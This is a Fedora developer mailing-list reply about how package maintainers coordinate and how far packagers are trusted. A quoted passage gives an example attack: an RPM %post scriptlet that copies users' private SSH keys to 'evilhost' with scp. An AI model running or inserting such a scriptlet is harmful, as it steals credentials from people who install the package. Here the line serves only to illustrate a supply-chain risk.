On Tue, 14 May 2013 21:04:59 +0100 "Richard W.M. Jones" <rjones@xxxxxxxxxx> wrote: > I suspect the main one is someone putting: > > %post > scp /home/*/.ssh/id_rsa evilhost: > > into a commonly used package, or something equivalent but more subtle > than that. > > Basically you're giving root access to everyone with a FAS packager > account (not that the current situation is that much better). well, no, thats not what I was talking about, that is a completely different issue. ;) I was referring to the fact that if we had a collection of around 14,000 packages and a pool of around 1400 maintainers if everyone just wandered around working on whatever they liked you would get X people fixing the same bug and duplicating effort, X people talking to upstream and telling them different things, X people figuring out a problem and waiting for something to happen for a real solution and someone else wandering in and fixing it in a poor/hacky way, X people telling users one decision and Y people telling them another, etc. If you have a small set of interested maintainers they can communicate between the group and divide work and come to consensus. Things don't scale to do that over the entire collection on every decision. To the issue you refer to above, it's already somewhat that you trust anyone maintaining packages you install, but additionally, there's a lot of reporting and logging that goes on, so if someone did do something like this it could be detected and fixed. You already also trust the upstreams for all the packages you install as well. kevin
Attachment:
signature.asc
Description: PGP signature
-- devel mailing list devel@xxxxxxxxxxxxxxxxxxxxxxx https://admin.fedoraproject.org/mailman/listinfo/devel
